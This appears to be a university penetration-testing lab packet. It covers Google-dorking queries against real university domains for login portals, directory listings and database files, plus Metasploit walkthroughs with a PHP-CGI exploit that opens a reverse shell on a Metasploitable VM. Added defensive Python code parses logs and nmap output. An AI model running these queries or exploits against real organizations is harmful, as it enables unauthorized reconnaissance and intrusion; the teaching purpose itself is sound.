Reference no: EM131258803

Assignment

Part 1: Google Hacking Lab

This is an introduction to using search engines for penetration testing. "Google Hacking" is a valuable skill for penetration testers. Google's crawlers continuously follow links across the web, fetch the pages and files they find, and index that content; the index therefore reflects whatever a site has exposed, whether or not the site owner meant to publish it. Google hacking could be called an art: the information you gather is limited only by your ingenuity in crafting queries. Keep in mind that the principles behind Google hacking apply to all search engines.

In this lab you will enumerate sub-domains, identify new machines, scour web servers for files that sit in directories but have been forgotten, learn about the underlying architecture of web servers, locate logon portals, and use targeted queries to locate specific file types. When clicking on results, use the cached version so that you visit Google's cache and not the website itself: the target's web server then never sees a request from you, which keeps this phase of reconnaissance passive.

1. Open a browser and navigate to: google.com

2. We're going to search exclusively for Wilmu domains.

2a. Type: site:wilmu.edu

3. We received too many www.wilmu.edu returns for this search to be of use. Let's subtract some information from our query.

3a. Type: site:wilmu.edu -site:www.wilmu.edu -site:libguides.wilmu.edu

3b. What new domains did you identify?

4. Now let's see what systems provide directory listings. Directory listings are important because there is the potential you will be able to see the entire website's file structure. Also, many webmasters forget to remove content they no longer make visible with hyperlinks. This content is valuable for various information gathering and exploitation reasons because it could be old pictures, databases, password files, etc. (Be sure to click on the cached links and not the actual links.)

4a. Type: site:umass.edu intitle:index.of (intitle:index.of matches the "Index of /..." title that Apache puts on an automatically generated directory listing.)

5. Another search we might do is for error or warning messages that give an indication of the underlying infrastructure and application. Depending on the error or warning we can determine whether the web server or application is Apache, IIS, SharePoint, WordPress, etc. To do this we use Google's OR operator, written as |. A query with the OR operator for status pages or default banners would look something like this: intitle:"apache status" "apache server status for" | "welcome to windows small business server 2003"

6. Let's look for applications and databases we may log in to. Many organizations use federated identity, meaning one set of credentials is accepted by several systems; when a single login carries you into the other systems without authenticating again, that is "single sign-on" or SSO. A login portal is therefore worth finding twice over: it is a system you can attack directly, and one compromised account may open several others.

6a. Type: site:wilmu.edu logon | login
6b. What portals did you find?

7. We found some interesting portals but those are for students. Where else might a penetration tester look?

7a. Type: site:wilmu.edu faculty | staff | admin | administrator + login | logon
7b. What results did you find?

8. We've been looking for interesting information about sub-domains, content posted on websites, and logon portals, but what about the files themselves? Are some file extensions more promising than others? Let's find out by searching for different file extensions.

8a. Type: site:wilmu.edu ext:pdf
8b. Type: site:wilmu.edu ext:asp username

What link did you find that may be of use?

8c. Type: ext:mdb (mdb is the Microsoft Access database extension. Note there is no site: filter here, so this query runs against the whole index.)

Did you find any interesting results?

VMware Home Lab Setup Instructions

1. Download all VMs.

1a. Download Kali VM: https://www.kali.org/downloads/
1b. Download Metasploitable 2 VM: https://information.rapid7.com/metasploitable-download.html
1c. Download VMware Player: https://my.vmware.com/web/vmware/free#desktop_end_user_computing/vmware_player/6_0
1d. Be sure to unzip all files.

2. Install VMWare Player.

3. Open VMware Player.

4. Click the "Open a Virtual Machine" option.

5. Navigate to the Metasploitable VM and select this file: Metasploitable.vmx

5a. If you get a prompt asking if you moved or copied the VM select: "I copied it."
5b. If you get a prompt asking if you want to download VMware Tools for Linux click "Download and Install".

6. Open a second instance of VMware Player.

7. Navigate to the Kali VM and select the .vmx file.

7a. If you get a prompt asking if you moved or copied the VM select: "I copied it."

Both your Kali VM and your Metasploitable VM should be running. Switch your focus to the Kali VM.

8. Type this username at the login prompt: root

9. Type this password: toor

We need to change the default password because it is not secure: root/toor is known to everyone. While the password we're changing it to isn't strong either (for the sake of simplicity in this class) we still need to change it on principle.

10. Type: passwd

11. Type the new password twice when prompted: wilmu123 (The later labs in this packet refer to the password as wilmuabc; use whichever one you actually set.)

12. Let's update Kali so we have the latest packages. These are ordinary shell commands, run as root in the terminal (not inside msfconsole).

12a. Type: apt-get update && apt-get upgrade

12b. Then type: apt-get dist-upgrade (This also pulls in packages whose dependencies changed. On Kali, Metasploit is a package and is updated along with the rest of the distribution this way.)

Now let's switch our focus to the Metasploitable VM.

13. At the user logon prompt type: msfadmin

This is an intentionally vulnerable system, so there's no point in changing the password from the default. For the same reason, keep it on a host-only or NAT network inside VMware and never expose it to a network you don't control.

14. At the password prompt type: msfadmin

You are now ready to pen test!

Introduction to Metasploit - A Tour

Class:
Name:
Date:

What is Metasploit?

Metasploit is an open source exploitation framework that has transcended its humble beginnings and become what I would call a "penetration testing environment suite". I say this because you can now use Metasploit for tasks in every phase of a penetration test, and based on your findings you may choose a tool or methodology, modify an existing one, or create a new one to accomplish your goal. While most commercial penetration testing products like Canvas have additional options and features, none provide the freedom and flexibility that Metasploit does. So while Kali is a wonderful Linux-based operating system loaded with tools, a pentester has most of what he or she needs in Metasploit alone. As you will soon learn in this course, Metasploit has reconnaissance tools (discovery and vulnerability scanners), malicious code generators, evasion options intended to keep your exploit from being caught by IPS or antivirus, password attack tools, and many, many more.

1.Open VMware and launch the Kali VM and login as root with your password wilmuabc.

2. Launch a shell. (It's the black box icon to the right of Applications, Places.)

3. Type: msfconsole

3a. Wait patiently for Metasploit to load.

3b. Open another shell and type: env (Look at the PATH variable. When you run a command, the shell searches each directory listed in PATH, in order, for an executable of that name. That's why you can type "msfconsole" from anywhere and the program runs.)

4. If you visit the Rapid7 website you will find you have the option to register for notifications, support, and updates of Metasploit. Rapid7 has moved from SVN to Git for code management. For our purposes here it doesn't matter, but if you enjoy working on the bleeding edge you may want to register and upgrade to the latest version.

5. Switch your focus back to the Metasploit shell. Look at the information under the banner and answer the questions below about the various modules available.

5a. How many exploits does Metasploit have:

5b. How many auxiliary modules does Metasploit have:

5c. How many post modules does Metasploit have:

5d. How many payloads does Metasploit have:

5e. How many encoders does Metasploit have:

5f. How many nops does Metasploit have:

Metasploit Modules Breakdown

I've defined Metasploit's modules below. Take the time to read them so you have a better understanding of their purpose and use.

Exploits - Modules that take advantage of a specific vulnerability to run a payload on the target. In Metasploit they are Ruby modules, not pre-packaged executables; the framework assembles the exploit, encoder and payload into the final attack at run time.

Payloads - The code that runs on the target once the exploit succeeds: a reverse shell that calls home, a bind shell that listens, or a small stager that pulls down a larger stage for further exploitation and persistence. Meterpreter is a particularly useful and commonly used payload.

Encoders - Transform a payload so it contains no bytes the target will choke on (bad characters such as null bytes) and so it no longer matches a simple byte signature. Encoding is not reliable antivirus evasion; see step 8.

Auxiliary - Modules that do not deliver a payload: port and service scanners, fuzzers, sniffers, denial-of-service tools, login brute-forcers and protocol helpers. Most of the reconnaissance in these labs uses auxiliary modules.

Post - Automation modules for post-exploitation. Tools to further establish access on a system or network, like keystroke loggers and privilege escalators.

NOPs - NOP generators produce "no operation" instructions used to pad a payload, for example as the NOP sled in a buffer overflow. Landing anywhere in the sled slides execution forward into the payload, which increases the chance that an imprecise jump still executes your code.

With that brief introduction behind us let's learn by doing.

*You may want to maximize your shell to full screen.

6. Type: help (Notice the list of commands available to you in Metasploit.)

7. Type: show exploits (Wait patiently for the Metasploit database to be queried and print the results to your terminal.)

7a. Notice the format: Name, Date, Rank, Description

7b. What is the date of the "windows/http/sonicwall_scrutinizer_sqli" exploit?

7c. What is its rank?

7d. What is its description?

8. Encoders re-encode your payload so that it avoids bad characters and no longer matches a fixed byte signature. Be careful with the common claim that encoding defeats antivirus or host IDS tools like McAfee's HBSS: the encoders ship with Metasploit, so their decoder stubs are well known and signatured, and modern AV also watches behaviour at run time rather than bytes on disk. Treat encoding as a tool for shaping the payload, not as reliable evasion.

8a. Type: show encoders
8b. Find and document an encoder here:

9. Payloads are the deliveries we will make to the system we are exploiting.

9a. Type: show payloads
9b. Find and document a payload for the Mac OS here:

10. We will use auxiliary modules quite a bit. There are a variety of community provided penetration testing tools located here.

10a. Type: show auxiliary
10b. Does the auxiliary module contain scanners?

Now let's get down to business and pretend we are professional penetration testers researching a strategy to gain access to an industrial control system network such as a water treatment plant.

11. We need to find a Windows SCADA exploit.

11a. Type: search windows/scada

12. Let's learn more about a particular module we found in our search results to confirm it will be useful to us.

12a. Type: info windows/scada/moxa_mdmtool
12b. Who provided this exploit?

12c. What are the options available for this exploit?

12d. What references are available?

12e. What does the description tell us this module does?

13. This may be the exploit we need to compromise the system.

13a. Type: use windows/scada/moxa_mdmtool
13b. Type: show payloads
13c. Document two payloads you might use that are available for this exploit:

14. Type: show advanced

14a. These advanced options, for the most part, won't normally be changed by you, but there are cases where you will want to. Scroll down to the SSL option. It's currently set to false. If you were running a reverse shell out of a network you may want to enable SSL, not only to hide your activity from network monitoring but also to protect your client: the data you pull back over the session belongs to them. The last thing you want is to expose the client's data to a third party because you transferred it in clear text over the internet. (The SSL option here belongs to the exploit's own listener; a plain reverse TCP shell payload stays in clear text regardless, so pick an encrypted payload transport if that matters.)

15. Type: show options

15a. These are the setting the exploit currently has.

16. Type: info

17. Type: help

17a. What command would you type to verify a system is vulnerable to this exploit?

17b. What command would use to execute the exploit?

18. Type: exit

Now let's take a look at how Metasploit's file system is organized.

19. Type: cd /usr/share/metasploit-framework/modules

19a. Type: ls (You should recognize the high level organization.)
19b. Type: cd exploits
19c. Type: ls (As you can see, you may drill down into each folder to view the tools Metasploit offers. Although this isn't necessary, it is good to understand how Metasploit is organized for troubleshooting modules: the module name you type after "use" is exactly this directory path, minus the leading modules/ and the .rb extension.)

You've gained a basic understanding of Metasploit's organization and how to explore this popular open source penetration testing tool suite. We'll gain a higher level of understanding and take part in a more advanced use of Metasploit in subsequent labs.

MetasploitMsfconsole Lab

Class:
Name:
Date:

1. Open VMware and launch the Kali VM and login as root with your password wilmuabc.

2. Open a shell by clicking on the little black box located at the top left of the desktop, to the right of the word "Places".

3. Type: service postgresql start

4. Launch Metasploit by typing: msfconsole

5. Type: db_status

6. Open another instance of VMware and launch the Metasploitable VM.

7. At the user logon prompt type: msfadmin

8. At the password prompt type: msfadmin

9. Type: ifconfig

10. Record the IP address here:

In this lab we'll be demonstrating the use of the msfconsole. We'll exploit a vulnerability of the Apache web server, deliver a payload, and confirm we have a reverse shell.

1. Switch back to Kali.

2. Type this and hit the enter key at the msf > prompt: db_nmap -p 1-1024 -sV x.x.x.x (the IP address of the Metasploitable system that you recorded in step 10 above). We've just run an Nmap port scan against our target. Because we used db_nmap rather than nmap, the results are also written to the Metasploit database in case we need to retrieve them for later review. We only scanned ports 1-1024, and the -sV switch makes Nmap probe each open port to determine the application and version running on it.

5. What service is running on these ports? (The command will take a couple of minutes to run.)

Port 21:
Port 22:
Port 23:
Port 25:
Port 53:
Port 80:
Port 111:
Port 139:
Port 445:
Port 512:
Port 513:
Port 514:

All of these ports and the services/applications running on them have the potential to be exploited but we have to determine the version of the software running on them.

6. Take notice of the TCP port 80. Apache httpd 2.2.8 (Ubuntu) is running. Let's see if we can find out more information about the software running on port 80.

7. Type: use scanner/http/http_version

8. Type: info (Make note of the RHOSTS option. We'll use that to specify the IP of our target.)

9. Type: set RHOSTS x.x.x.x (This is our target's IP.)

10.Type: set RPORT 80

11. Type: exploit

12. Take notice of the results. The http_version scanner reports the Server header: Apache/2.2.8 (Ubuntu) DAV/2 ( Powered by PHP/5.2.4-2ubuntu5.10 )

13. We just learned a little bit more about our Apache server running on Ubuntu. It's running PHP 5.2.4 (the -2ubuntu5.10 suffix is the Ubuntu package revision).

14. Let's find out what exploits exist for PHP. Maximize your VMware window and type: clear

15. Type and wait: search php type:exploit

16. Type: use exploit/multi/http/php_cgi_arg_injection

17. Type: info

a. What version of PHP does the description say is vulnerable to this exploit?

18. Now that we believe we may have a working exploit let's view and choose the desired payload that is compatible with this exploit. Type: show payloads

19. We'll go with a stable and reliable reverse shell. Type: set PAYLOAD generic/shell_reverse_tcp

20. Type: set RHOST x.x.x.x (IP of the target. Newer Metasploit releases call this option RHOSTS; use whichever name "show options" lists.)

21. Type: set LHOST x.x.x.x (Your Kali IP. The target connects back to this address, so it must be one the target can reach.)

22. Type: set LPORT 1234

23. Type: show options (This will verify your changes. Make sure the options you have set are showing.)

24. Type: show advanced (Verify there is nothing else you want to change.)

25. Type: exploit

26. You may be asking yourself what, if anything, happened. The prompt doesn't change, but you are now typing into a command shell on the target. Type: ls

a. How many files and folders were displayed.

27. Type: pwd

a. Document your present working directory.

28. Type: whoami

a. Document the name of the account you are logged on with.

29. Type: uname -a

30. Type: cat /etc/issue

Excellent! You've used the MSFconsole to run a port scan and save the contents of that scan to a database for later retrieval. You further investigated a port of interest by running an additional scanner against it and determined more information about the application and version information. You then searched Metasploit's database for applicable exploits. Once you found an appropriate exploit you determined the payload you will use, ran it, got a reverse shell, and verified connectivity by executing some simple commands. Congratulations!

Following these simple steps when trying to penetration test systems will aid you in better understanding the nuances of exploiting systems.

31. Press Ctrl+C to abort the session and type "y" when prompted.

32. Type: back

33. Type: exit
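The php_cgi_arg_injection module you just ran exploits CVE-2012-1823, a php-cgi bug fixed in PHP 5.3.12 and 5.4.2; the PHP 5.2.4 build on Metasploitable predates the fix. Under the CGI spec, a query string with no literal "=" is split on "+", percent-decoded and passed to the CGI program as command-line arguments, and a vulnerable php-cgi honoured those as its own switches. The Python below is an added example, not part of the handout or the Metasploit module: it reconstructs the argv php-cgi would see for a request and flags the pattern in Apache access log lines. The log lines and the log-format regular expression are constructed assumptions.

```python
"""Detect PHP-CGI argument injection (CVE-2012-1823) in Apache access logs.

Added example for this lab, not code from the handout or from Metasploit.
The log lines below are constructed. The exploit sends a query like
"?-d+allow_url_include%3d1+-d+auto_prepend_file%3dphp://input" so that
php-cgi executes whatever the attacker POSTs.
"""
import re
from urllib.parse import unquote

# Constructed sample in Apache "common" log format (assumed format).
SAMPLE_LOG = """\
10.0.0.5 - - [12/Mar/2014:10:01:02 -0500] "GET /index.php HTTP/1.1" 200 1234
10.0.0.9 - - [12/Mar/2014:10:01:07 -0500] "POST /?-d+allow_url_include%3dOn+-d+auto_prepend_file%3dphp%3a%2f%2finput HTTP/1.1" 200 812
10.0.0.9 - - [12/Mar/2014:10:01:09 -0500] "GET /cgi-bin/php?-s HTTP/1.1" 200 9001
10.0.0.5 - - [12/Mar/2014:10:02:00 -0500] "GET /index.php?page=-d HTTP/1.1" 200 1234
"""

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) \S+'
)

# php-cgi switches worth flagging: -d sets an ini directive, -s dumps source,
# -n/-c change which php.ini is used, -i prints phpinfo, -h help, -T loops.
PHP_SWITCH = re.compile(r'^-[dsncihT]')


def cgi_argv(target: str) -> list:
    """Return the argv php-cgi would receive for this request target.

    Only a query string without a literal "=" takes the argv path; "?page=-d"
    stays in QUERY_STRING and is harmless. That is why the exploit encodes
    its "=" as %3d.
    """
    if "?" not in target:
        return []
    query = target.split("?", 1)[1]
    if "=" in query:
        return []
    return [unquote(part) for part in query.split("+") if part]


def is_arg_injection(target: str) -> bool:
    return any(PHP_SWITCH.match(arg) for arg in cgi_argv(target))


def scan_log(text: str) -> list:
    """Return one dict per request that would reach php-cgi as switches."""
    hits = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if m is None:
            continue
        argv = cgi_argv(m["target"])
        if any(PHP_SWITCH.match(arg) for arg in argv):
            hits.append({"ip": m["ip"], "time": m["ts"],
                         "target": m["target"], "argv": argv})
    return hits


if __name__ == "__main__":
    for hit in scan_log(SAMPLE_LOG):
        print(hit["ip"], hit["time"], hit["argv"])
```

To see the real thing, run the exploit again and then read /var/log/apache2/access.log on the Metasploitable VM through scan_log. The request only reaches argv when PHP runs as a CGI; a mod_php installation never takes this path, which is what the module's check is really testing for.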

Part 2: Metasploit Database Lab

1. If your VMs aren't already running, open VMware and launch the Kali VM and login as root with your password wilmuabc. *If Metasploit is loaded from a previous lab it must be closed.

2. Open a shell by clicking on the little black box located at the top left of the desktop, to the right of the word "Places".

3. Type: service postgresql start
3a. Type: service metasploit start (On the Kali release this lab was written for, the first start of this service creates the database user and database that msfconsole will connect to.)
3b. Type: service metasploit stop (Current Kali releases no longer ship a metasploit service; run msfdb init once instead, which creates the database and writes the connection settings msfconsole reads.)

4. Launch Metasploit. Type: msfconsole

Once Metasploit launches it connects to the Postgres database using the stored settings. Verify the connection:

5. Type: db_status (You should see a connection to the database.)

6a. Are we connected to a database?

6. If Metasploitable isn't already running open another instance of VMware and launch the Metasploitable VM.

7. At the user logon prompt type: msfadmin

8. At the password prompt type: msfadmin

9. Type: ifconfig

10. Record the IP address here:

Metasploit has a default relational database you can populate with data. The database is very useful for capturing and organizing penetration testing data that you may want to refer to again, use for automating penetration tests, share with others, create reports, etc. The database contains these tables: hosts, services, vulns, clients, loot (passwords, hashes, etc), and notes.

Useful database commands are:
db_connect (Connects you to an existing database, e.g. db_connect user:password@127.0.0.1/msf.)
db_disconnect (Disconnects you from the current database.)
db_driver (In older releases, selected the database type: MySQL, SQLite, PostgreSQL, etc. Current Metasploit supports only PostgreSQL and the command has been removed.)
db_status (Tells you whether you're connected and to which database.)
db_export (Exports the contents of the database, either as Metasploit's own XML or as a pwdump file of gathered credentials.)

1. We know we are connected to the database so now let's populate it with target information. Switch back to your Kali VM and return to the Metasploit prompt msf>.

2. Type: db_nmap x.x.x.x (IP of your target.)

3. You've just added the contents of your nmap scan to the database. Let's view the individual tables.

4. Type: hosts

a. What hosts are listed in the table?

5. Type: services

a. What information is provided in this table?

6. We would normally also type "notes" or "loot" or "vulns" but we haven't populated the database with any of that information. FYI, the vulns information may be imported from .nessus files. If you're not familiar with Nessus Google it for quick reference. These tables will populate as you exploit systems.

Interacting with a database when performing reconnaissance or running a vulnerability scan may not seem immensely helpful in a lab setting because we're only scanning 1 system, but what if we were scanning 10 systems or 100 systems or 1000 systems or 10000 systems or even more? It is simply not feasible for a pen tester to scroll through the results and manually document interesting findings. That's where the beauty of logging our penetration testing results to a database really pays off. Being able to instantly reference all of the hosts we've scanned for a project, or to review all of the possible vulnerabilities in systems we'll be exploiting, is a professional approach to handling the mountains of data that may be generated during a customer engagement.
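db_nmap gets its data by running nmap with XML output and importing the result, and the hosts and services tables are what that import produces. As an added example (not Metasploit's or nmap's code) the Python below parses the XML nmap writes with -oX into the same hosts/services view and adds the query that matters at scale: which hosts run a given product version. The XML document is constructed; the port 80 entry mirrors the Apache httpd 2.2.8 (Ubuntu) banner from the msfconsole lab, and every other host, port and version in it is invented for illustration.

```python
"""Turn nmap's XML output into the hosts/services tables msfconsole keeps.

Added example, not code from Metasploit or the handout. Feed it real data
with `nmap -sV -p 1-1024 -oX scan.xml <targets>`; the document below is
constructed (port 80 mirrors the Apache httpd 2.2.8 (Ubuntu) banner from the
earlier lab, everything else is invented for illustration).
"""
import xml.etree.ElementTree as ET
from collections import defaultdict
from typing import Dict, List, Optional

SAMPLE_NMAP_XML = """<?xml version="1.0"?>
<nmaprun scanner="nmap" args="nmap -sV -p 1-1024 -oX - 192.168.56.0/24">
  <host>
    <status state="up"/>
    <address addr="192.168.56.101" addrtype="ipv4"/>
    <hostnames><hostname name="metasploitable" type="PTR"/></hostnames>
    <ports>
      <port protocol="tcp" portid="21"><state state="open"/><service name="ftp"/></port>
      <port protocol="tcp" portid="80"><state state="open"/>
        <service name="http" product="Apache httpd" version="2.2.8" extrainfo="(Ubuntu)"/>
      </port>
      <port protocol="tcp" portid="139"><state state="filtered"/><service name="netbios-ssn"/></port>
    </ports>
  </host>
  <host>
    <status state="up"/>
    <address addr="192.168.56.102" addrtype="ipv4"/>
    <ports>
      <port protocol="tcp" portid="22"><state state="open"/>
        <service name="ssh" product="OpenSSH" version="5.3p1"/>
      </port>
    </ports>
  </host>
  <host>
    <status state="down"/>
    <address addr="192.168.56.103" addrtype="ipv4"/>
  </host>
</nmaprun>
"""


def parse_nmap_xml(xml_text: str):
    """Return (hosts, services). hosts maps IP -> hostname (or None) for hosts
    that are up; services is one dict per scanned port, shaped like the rows
    of msfconsole's `services` table."""
    root = ET.fromstring(xml_text)
    hosts: Dict[str, Optional[str]] = {}
    services: List[dict] = []
    for host in root.findall("host"):
        if host.find("status").get("state") != "up":
            continue
        addr = host.find("address[@addrtype='ipv4']").get("addr")
        hn = host.find("hostnames/hostname")
        hosts[addr] = hn.get("name") if hn is not None else None
        for port in host.findall("ports/port"):
            svc = port.find("service")
            info = ""
            if svc is not None:
                info = " ".join(s for s in (svc.get("product"), svc.get("version"),
                                            svc.get("extrainfo")) if s)
            services.append({
                "host": addr,
                "port": int(port.get("portid")),
                "proto": port.get("protocol"),
                "state": port.find("state").get("state"),
                "name": svc.get("name") if svc is not None else "",
                "info": info,
            })
    return hosts, services


def open_ports(services: List[dict], host: str) -> List[int]:
    """Equivalent of `services -u` narrowed to one host."""
    return sorted(s["port"] for s in services
                  if s["host"] == host and s["state"] == "open")


def service_on(services: List[dict], host: str, port: int) -> str:
    """Answer the lab's "what service is running on port N" for one host."""
    for s in services:
        if s["host"] == host and s["port"] == port:
            if s["state"] != "open":
                return s["state"]
            return f'{s["name"]} {s["info"]}'.strip()
    return "not scanned"


def services_by_version(services: List[dict]) -> Dict[str, List[str]]:
    """Group host:port by product/version string: the query you want when there
    are hundreds of hosts and one vulnerable version."""
    groups = defaultdict(list)
    for s in services:
        if s["state"] == "open" and s["info"]:
            groups[s["info"]].append(f'{s["host"]}:{s["port"]}')
    return dict(groups)


if __name__ == "__main__":
    hosts, services = parse_nmap_xml(SAMPLE_NMAP_XML)
    for ip, name in hosts.items():
        print(ip, name or "", open_ports(services, ip))
    print(services_by_version(services))
```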

Part 4: Updating Metasploit Lab

1. Open VMware and launch the Kali VM and login as root with your password wilmuabc.

2. Open a shell by clicking on the little black box located at the top left of the desktop, to the right of the word "Places".

3. Launch Metasploit by typing: msfconsole

There are many reasons to update Metasploit. Updating installs bug fixes and new community tools and, most importantly, adds exploit modules. There are two ways to do this.

Your first option is to update Metasploit in an automated fashion by typing "msfupdate" at the command line. On a Metasploit installed with Rapid7's own installer this requires registration for a community edition key; on Kali, where Metasploit ships as a package, msfupdate defers to the package manager and the framework is updated with "apt-get update && apt-get install metasploit-framework". Either way this brings in the latest settings, Ruby version, modules, etc. You may also simply update Kali by going to "Applications-System Tools-Software Update".

The second way to update Metasploit is manually. Being able to do this matters because it lets you import the latest exploits, regardless of where you find them, as long as they follow Rapid7's development rules for Metasploit modules. It also matters because the automated update will sometimes break your install by changing your Ruby version or making another change to your environment. This lab will sharpen your skills as a penetration tester by having you search for an exploit online, download it, install it, and test it.

There is a third way to update Metasploit: build your own module. You'll need to know how to program in Ruby. You can learn more about Metasploit exploit development here: https://www.offensive-security.com/metasploit-unleashed/Exploit_Development

1. Using your Kali VM, open the Iceweasel web browser by clicking on the icon to the right of the word "Places" and navigate to: https://www.exploit-db.com/ Wordpress is a popular content management system used for blogging on the world wide web. It has been in the news recently for having multiple vulnerabilities.

2. Click on the "Search" button.

3. In the "Free Text Search" field type: Wordpress

4. Click "Search".

5. Look at the exploits and notice the information on the left of the screen. One of the most important things to notice is the check mark. The check mark indicates the exploit has been verified by the Exploit-DB team (Exploit-DB is maintained by Offensive Security, not Rapid7). Verified means someone reproduced it, not that it is safe to run: it's critical that you read an exploit and only import and use trusted ones. Otherwise, you could be importing a trojan horse, or worse, onto your system or your customer's system.

6. Go to page 9 and click on "Wordpress HMS Testimonials Plugin 2.0.10 - Multiple Vulnerabilities".

7. Who is the author of this exploit?

7a.

8. What date was this exploit published?

8a.

9. Now click the download icon next to these words "Exploit Code:".

10. What type of file is this?

10a.

11. Open the file that you downloaded. As you can see these are instructions for exploiting a WordPress vulnerability in the way user feedback may be posted. So how would you go about loading this module into Metasploit? You wouldn't. This is simply a text file that walks through manually exploiting WordPress but I chose to show it to you because, as you can see, when you're looking for the latest exploits you don't always need to load a module. There are hands-on instructions for exploiting this vulnerability. If there isn't a current exploit in Metasploit for your vulnerability be sure to check Exploit-db.com, not just for modules but also for hands-on exploit instructions.

Metasploit is written in Ruby. This means that modules need to be .rb files. Any exploit that we want to import will need to be ported to a Ruby module if it isn't one already.

12. Close the text file and return to the web page. Go to page 9 and locate this exploit and click on it: Wordpress W3 Total Cache PHP Code Execution

13. Click the download icon. When prompted to save the file name it: wordpress_w3_php_code_exec.rb Hit the drop-down arrow next to "Save in folder:" and select "Desktop".

14. Click "Save".

15. Minimize all of your windows. You should see a Ruby file on your desktop.

16. Switch your focus to your Metasploit instance. How many exploits are listed? Type: banner

16a.

17. Now it's time to import your new Ruby file into the Metasploit framework. Open a shell by clicking on the black box next to the word "Places" at the top of your desktop screen. Type this, on one line, to copy in your new exploit: cp /root/Desktop/wordpress_w3_php_code_exec.rb /usr/share/metasploit-framework/modules/exploits/multi/php/

The path decides the module name: a file in modules/exploits/multi/php/ becomes exploit/multi/php/<filename without .rb>. Copying into /usr/share works for the lab, but a package update can overwrite that tree; msfconsole also loads modules from ~/.msf4/modules/ using the same directory layout, which is where you should keep modules of your own on a real engagement.

18. Switch back to your Metasploit shell and type: reload_all

19. How many exploits do you have now?

19a.

20. Type: use exploit/multi/php/wordpress_w3_php_code_exec

21. Type: info

What does this module do?

21a.

You now have a better understanding of when to download a single exploit versus updating your entire Metasploit install. You've looked for a recently published exploit, downloaded it, copied it to the appropriate location within Metasploit, and verified its availability as a module.
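The copy-and-reload step above hides two things a practitioner should check before loading code from the internet into a framework that runs as root: that the file is actually a module rather than a write-up, and what exactly was loaded (so it can be recorded and, if needed, removed). The Python below is an added example, not Rapid7's code; it derives the module name from the destination path the way the lab describes and stages the file after structural checks. The module text it stages is a constructed stub with no exploit in it, and the directory-to-prefix table is this example's assumption about the layout shown in the lab.

```python
"""Stage a downloaded module where msfconsole will load it, and derive the name
`use` expects from the path.

Added example, not Rapid7's code. It assumes the tree layout shown in the lab,
modules/<type>/<platform>/.../<name>.rb; SAMPLE_MODULE is a constructed stub.
"""
import hashlib
import re
import tempfile
from pathlib import Path

# Directory name under modules/  ->  prefix used by `use` / `info`.
TYPE_DIRS = {"exploits": "exploit", "auxiliary": "auxiliary", "post": "post",
             "payloads": "payload", "encoders": "encoder", "nops": "nop"}

# Every framework module defines a class derived from an Msf:: base class;
# modules of this lab's era were named Metasploit3 / Metasploit4.
CLASS_RE = re.compile(
    r"^\s*class\s+(?:MetasploitModule|Metasploit[34])\s*<\s*Msf::", re.M)

SAMPLE_MODULE = """# Constructed stub for illustration only; it does nothing.
require 'msf/core'

class MetasploitModule < Msf::Exploit::Remote
  def initialize(info = {})
    super(update_info(info, 'Name' => 'Constructed example stub'))
  end
end
"""


def module_name(dest: str, modules_root: str) -> str:
    """modules/exploits/multi/php/foo.rb -> exploit/multi/php/foo.

    The directories under the type directory plus the file name (minus .rb)
    are the module name; nothing inside the file decides it."""
    rel = Path(dest).relative_to(Path(modules_root))
    parts = rel.with_suffix("").parts
    if len(parts) < 2 or parts[0] not in TYPE_DIRS:
        raise ValueError(f"{dest} is not under a known module type directory")
    return "/".join((TYPE_DIRS[parts[0]],) + parts[1:])


def stage_module(src: str, modules_root: str, type_dir: str, subdir: str):
    """Copy src into modules_root/type_dir/subdir/ after structural checks.

    Returns (module name, sha256 of the file) so you can record what you
    loaded. These checks say nothing about whether the code is trustworthy;
    that is what reading it and using vetted sources is for."""
    src_path = Path(src)
    if src_path.suffix != ".rb":
        raise ValueError("Metasploit modules are Ruby files (.rb)")
    if type_dir not in TYPE_DIRS:
        raise ValueError(f"unknown module type directory {type_dir!r}")
    text = src_path.read_text()
    if not CLASS_RE.search(text):
        raise ValueError("no Metasploit module class found; a write-up, not a module?")
    dest = Path(modules_root) / type_dir / subdir / src_path.name
    dest.parent.mkdir(parents=True, exist_ok=True)
    dest.write_text(text)
    return module_name(str(dest), modules_root), hashlib.sha256(text.encode()).hexdigest()


def demo():
    """Stage the stub into a throwaway tree standing in for ~/.msf4/modules."""
    root = Path(tempfile.mkdtemp())
    src = root / "wordpress_w3_php_code_exec.rb"
    src.write_text(SAMPLE_MODULE)
    name, digest = stage_module(str(src), str(root / "modules"), "exploits", "multi/php")
    staged = (root / "modules" / "exploits" / "multi" / "php" / src.name).exists()
    return name, digest, staged


if __name__ == "__main__":
    print(demo())
```

After staging, reload_all in msfconsole picks the file up and "use" accepts the returned name; keep the digest with your engagement notes so the exact module you ran can be identified later.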

Now let's look at the professional version of Metasploit.

Type: go_pro

Follow the prompts to upgrade your Metasploit version from the framework edition to the professional version. (The go_pro command has since been removed from the framework, so on a current Kali it reports an unknown command; Metasploit Pro is a separate commercial product obtained from Rapid7.)

Part 5: Metasploit Scanning Lab

1. If your VMs aren't already running then open VMware and launch the Kali VM and login as root with your password wilmuabc.

2. Open a shell by clicking on the little black box located at the top left of the desktop, to the right of the word "Places".

3. Type: msfconsole

4. Open another instance of VMware Player and launch the Metasploitable VM.

5. At the user logon prompt type: msfadmin

6. At the password prompt type: msfadmin

7. Type: ifconfig

8. Record the Metasploitable VM IP address here:

Metasploit has numerous scanners located in various places. Let's become familiar with how to find and identify the scanners we need. Not all scanners are built alike. Some are very limited but very good at what they do while others are more broad in functionality and applicable in many instances.

Switch to your Kali VM and type "back" if you currently have a module loaded from a previous lab.

1. Open another shell and type: ls /usr/share/metasploit-framework/modules/auxiliary/scanner/portscan

2. These are just a few of the built in port scanners Metasploit has to offer.

2a. What port scanners are available?

3. Pick one and list the options and advanced options.

3a. Switch to your Kali VM and type: use auxiliary/scanner/portscan/xmas
3b. Type: show options
3c. Type: show advanced

4. Type: back

5. Switch to the other shell (Not Metasploit.) and type: ls /usr/share/metasploit-framework/modules/auxiliary/scanner/discovery

6. Notice we have more discovery tools.

6a. List a tool and what it does.

6b. Switch back to your other shell and type:

use auxiliary/scanner/discovery/arp_sweep

6c. Type: show options

6d. Type: show advanced

7. Let's search for more scanners.

7a. Type: search type:auxiliary scanner

7b. If you have trouble reading the output make sure your shell is maximized as well as your instance of VMware.

8. What scanner may I use to brute force Outlook Web Access logins?

8a. Type: search type:auxiliary outlook

